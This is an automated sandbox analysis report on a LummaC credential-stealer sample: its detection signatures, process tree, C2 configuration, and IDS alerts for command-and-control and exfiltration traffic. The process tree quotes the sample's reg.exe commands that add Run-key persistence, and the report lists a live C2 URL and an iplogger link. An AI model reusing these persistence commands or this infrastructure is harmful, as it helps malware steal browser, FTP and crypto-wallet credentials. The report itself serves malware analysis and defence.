Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565453
MD5:eff5fbe427181fe1a3eed978cf0c9a36
SHA1:ddc48ac8b408c35b8bae9caf0b6c69df56a7c3e3
SHA256:7119f52e94061723532085e4a082e0cb8bd3a6788b729fa41730571d77924c4d
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
File is packed with WinRar
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EFF5FBE427181FE1A3EED978CF0C9A36)
    • cmd.exe (PID: 2708 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2084 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1732 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • dileapp.exe (PID: 3696 cmdline: C:\Users\Public\Netstat\dileapp.exe MD5: B0D5568D499D1DFA75064E85E9FB3EAC)
      • chrome.exe (PID: 2128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • dileapp.exe (PID: 7984 cmdline: "C:\Users\Public\Netstat\dileapp.exe" MD5: B0D5568D499D1DFA75064E85E9FB3EAC)
  • dileapp.exe (PID: 7568 cmdline: "C:\Users\Public\Netstat\dileapp.exe" MD5: B0D5568D499D1DFA75064E85E9FB3EAC)
  • dileapp.exe (PID: 5448 cmdline: "C:\Users\Public\Netstat\dileapp.exe" MD5: B0D5568D499D1DFA75064E85E9FB3EAC)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://water-acidict.cyou/api", "Build Version": "c2CoW0--bandl"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000F.00000003.1982904201.0000000000F67000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000F.00000003.2008902691.0000000000F58000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000F.00000003.1983969551.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 20 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution from Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Netstat\dileapp.exe, CommandLine: C:\Users\Public\Netstat\dileapp.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\dileapp.exe, NewProcessName: C:\Users\Public\Netstat\dileapp.exe, OriginalFileName: C:\Users\Public\Netstat\dileapp.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2708, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\dileapp.exe, ProcessId: 3696, ProcessName: dileapp.exe
                Sigma detected: New RUN Key Pointing to Suspicious Folder
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Netstat\dileapp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                Sigma detected: Suspicious Program Location with Network Connections
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 172.67.156.217, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\dileapp.exe, Initiated: true, ProcessId: 3696, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\dileapp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                Sigma detected: Direct Autorun Keys Modification
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2708, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", ProcessId: 2084, ProcessName: reg.exe
                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2708, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", ProcessId: 2084, ProcessName: reg.exe
                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\dileapp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1732, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Netstat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T23:10:03.083696+010020283713Unknown Traffic192.168.2.449738172.67.156.217443TCP
                2024-11-29T23:10:05.381097+010020283713Unknown Traffic192.168.2.449742172.67.156.217443TCP
                2024-11-29T23:10:09.326265+010020283713Unknown Traffic192.168.2.449746172.67.156.217443TCP
                2024-11-29T23:10:11.518319+010020283713Unknown Traffic192.168.2.449747172.67.156.217443TCP
                2024-11-29T23:10:13.998058+010020283713Unknown Traffic192.168.2.449748172.67.156.217443TCP
                2024-11-29T23:10:16.465151+010020283713Unknown Traffic192.168.2.449750172.67.156.217443TCP
                2024-11-29T23:10:17.717727+010020283713Unknown Traffic192.168.2.449751172.67.156.217443TCP
                2024-11-29T23:10:18.955180+010020283713Unknown Traffic192.168.2.449753172.67.156.217443TCP
                2024-11-29T23:10:20.340625+010020283713Unknown Traffic192.168.2.449756172.67.156.217443TCP
                2024-11-29T23:10:21.578273+010020283713Unknown Traffic192.168.2.449757172.67.156.217443TCP
                2024-11-29T23:10:22.885391+010020283713Unknown Traffic192.168.2.449759172.67.156.217443TCP
                2024-11-29T23:10:24.063993+010020283713Unknown Traffic192.168.2.449760172.67.156.217443TCP
                2024-11-29T23:10:25.392585+010020283713Unknown Traffic192.168.2.449762172.67.156.217443TCP
                2024-11-29T23:10:25.928587+010020283713Unknown Traffic192.168.2.449763172.67.156.217443TCP
                2024-11-29T23:10:27.399011+010020283713Unknown Traffic192.168.2.449764172.67.156.217443TCP
                2024-11-29T23:10:28.118931+010020283713Unknown Traffic192.168.2.449766172.67.156.217443TCP
                2024-11-29T23:10:28.156076+010020283713Unknown Traffic192.168.2.449765172.67.156.217443TCP
                2024-11-29T23:10:30.938533+010020283713Unknown Traffic192.168.2.449767172.67.156.217443TCP
                2024-11-29T23:10:31.156343+010020283713Unknown Traffic192.168.2.449768172.67.156.217443TCP
                2024-11-29T23:10:33.638020+010020283713Unknown Traffic192.168.2.449770172.67.156.217443TCP
                2024-11-29T23:10:33.778394+010020283713Unknown Traffic192.168.2.449771172.67.156.217443TCP
                2024-11-29T23:10:36.148117+010020283713Unknown Traffic192.168.2.449772172.67.156.217443TCP
                2024-11-29T23:10:36.424088+010020283713Unknown Traffic192.168.2.449773172.67.156.217443TCP
                2024-11-29T23:10:39.127476+010020283713Unknown Traffic192.168.2.449774172.67.156.217443TCP
                2024-11-29T23:10:41.685041+010020283713Unknown Traffic192.168.2.449775172.67.156.217443TCP
                2024-11-29T23:10:44.581063+010020283713Unknown Traffic192.168.2.449776172.67.156.217443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T23:10:04.141303+010020546531A Network Trojan was detected192.168.2.449738172.67.156.217443TCP
                2024-11-29T23:10:10.160791+010020546531A Network Trojan was detected192.168.2.449746172.67.156.217443TCP
                2024-11-29T23:10:12.322134+010020546531A Network Trojan was detected192.168.2.449747172.67.156.217443TCP
                2024-11-29T23:10:18.836476+010020546531A Network Trojan was detected192.168.2.449751172.67.156.217443TCP
                2024-11-29T23:10:21.162974+010020546531A Network Trojan was detected192.168.2.449756172.67.156.217443TCP
                2024-11-29T23:10:26.805193+010020546531A Network Trojan was detected192.168.2.449763172.67.156.217443TCP
                2024-11-29T23:10:28.257495+010020546531A Network Trojan was detected192.168.2.449764172.67.156.217443TCP
                2024-11-29T23:10:28.798831+010020546531A Network Trojan was detected192.168.2.449766172.67.156.217443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T23:10:04.141303+010020498361A Network Trojan was detected192.168.2.449738172.67.156.217443TCP
                2024-11-29T23:10:10.160791+010020498361A Network Trojan was detected192.168.2.449746172.67.156.217443TCP
                2024-11-29T23:10:18.836476+010020498361A Network Trojan was detected192.168.2.449751172.67.156.217443TCP
                2024-11-29T23:10:26.805193+010020498361A Network Trojan was detected192.168.2.449763172.67.156.217443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T23:10:12.322134+010020498121A Network Trojan was detected192.168.2.449747172.67.156.217443TCP
                2024-11-29T23:10:21.162974+010020498121A Network Trojan was detected192.168.2.449756172.67.156.217443TCP
                2024-11-29T23:10:28.798831+010020498121A Network Trojan was detected192.168.2.449766172.67.156.217443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T23:10:17.434629+010020480941Malware Command and Control Activity Detected192.168.2.449750172.67.156.217443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\Users\Public\Netstat\dileapp.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                Found malware configuration
                Source: dileapp.exe.7984.9.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://water-acidict.cyou/api", "Build Version": "c2CoW0--bandl"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 28%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\Public\Netstat\dileapp.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: https://iplogger.co/1tJFB4HTTP Parser: No favicon
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49748 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49757 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49763 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49764 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49770 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49771 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49778 version: TLS 1.2
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0079A273
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AA537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007AA537

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49746 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49763 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49751 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49763 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49751 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49750 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49764 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49747 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49766 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49756 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49756 -> 172.67.156.217:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://water-acidict.cyou/api
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: Joe Sandbox ViewIP Address: 104.21.82.93 104.21.82.93
                Source: Joe Sandbox ViewIP Address: 172.67.167.249 172.67.167.249
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49768 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49760 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49763 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49764 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49772 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49770 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49776 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49762 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49774 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 172.67.156.217:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 172.67.156.217:443
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
